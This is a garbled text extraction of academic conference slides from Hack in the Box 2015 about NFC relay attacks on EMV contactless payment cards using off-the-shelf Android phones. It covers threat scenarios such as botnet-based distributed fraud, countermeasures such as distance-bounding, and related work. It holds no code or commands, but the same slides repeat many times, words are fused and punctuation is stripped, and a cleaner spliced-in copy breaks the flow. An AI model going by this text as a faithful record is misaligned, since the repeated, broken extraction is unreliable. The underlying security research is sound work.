One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1

Distributed Mafia Fraud

BOT

BOTMASTER

BOT

BOT

BOT

BOT

BOT

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36

Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2

Hiding Fraud Locations

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36

Relay Attack Implementation (IV)Resistant Mechanisms

Brief summary of resistant mechanismsDistance-bounding protocols

Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages

Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands

Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36

Related WorkOn relay attacks

2005-2009 First works built on specific hardware

2010 Nokia mobile phones with NFC capability plus a Java MIDletapp

2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device

2014 Active relay attacks with custom hardware and customAndroid firmware

Several works studied delay upon relay channel

Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint

Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 42: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1

Distributed Mafia Fraud

BOT

BOTMASTER

BOT

BOT

BOT

BOT

BOT

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36

Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2

Hiding Fraud Locations

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36

Relay Attack Implementation (IV)Resistant Mechanisms

Brief summary of resistant mechanismsDistance-bounding protocols

Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages

Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands

Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36

Related WorkOn relay attacks

2005-2009 First works built on specific hardware

2010 Nokia mobile phones with NFC capability plus a Java MIDletapp

2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device

2014 Active relay attacks with custom hardware and customAndroid firmware

Several works studied delay upon relay channel

Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint

Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36


Conclusions (I)

The security of NFC rests on the physical proximity assumption.

NFC threats: eavesdropping, data modification, relay attacks. Android NFC-capable devices are on the rise, and an abused device can interact with any cards in its proximity.

Conclusions:

Review of the Android NFC stack

Proof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attacks may appear before long


Conclusions (II): But then, what the hell can I do? Should I run away?


Conclusions (III)

Future Work:

Develop a botnet infrastructure and earn money

Timing constraints of Android HCE mode

Try active relay attacks against EMV contactless cards

Acknowledgments:

Spanish National Cybersecurity Institute (INCIBE)

University of León, under contract X43

HITB staff

And thanks to all of you for listening to us.

Visit http://vwzq.net/relaynfc for more info about the project.

Page 43: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1

Distributed Mafia Fraud

BOT

BOTMASTER

BOT

BOT

BOT

BOT

BOT

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36

Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2

Hiding Fraud Locations

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36

Relay Attack Implementation (IV)Resistant Mechanisms

Brief summary of resistant mechanismsDistance-bounding protocols

Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages

Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands

Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36

Related WorkOn relay attacks

2005-2009 First works built on specific hardware

2010 Nokia mobile phones with NFC capability plus a Java MIDletapp

2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device

2014 Active relay attacks with custom hardware and customAndroid firmware

Several works studied delay upon relay channel

Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint

Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 44: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2

Hiding Fraud Locations

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36

Relay Attack Implementation (IV)Resistant Mechanisms

Brief summary of resistant mechanismsDistance-bounding protocols

Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages

Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands

Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36

Related WorkOn relay attacks

2005-2009 First works built on specific hardware

2010 Nokia mobile phones with NFC capability plus a Java MIDletapp

2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device

2014 Active relay attacks with custom hardware and customAndroid firmware

Several works studied delay upon relay channel

Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint

Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 45: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Relay Attack Implementation (IV)Resistant Mechanisms

Brief summary of resistant mechanismsDistance-bounding protocols

Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages

Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands

Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36

Related WorkOn relay attacks

2005-2009 First works built on specific hardware

2010 Nokia mobile phones with NFC capability plus a Java MIDletapp

2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device

2014 Active relay attacks with custom hardware and customAndroid firmware

Several works studied delay upon relay channel

Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint

Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 46: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36

Related WorkOn relay attacks

2005-2009 First works built on specific hardware

2010 Nokia mobile phones with NFC capability plus a Java MIDletapp

2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device

2014 Active relay attacks with custom hardware and customAndroid firmware

Several works studied delay upon relay channel

Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint

Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
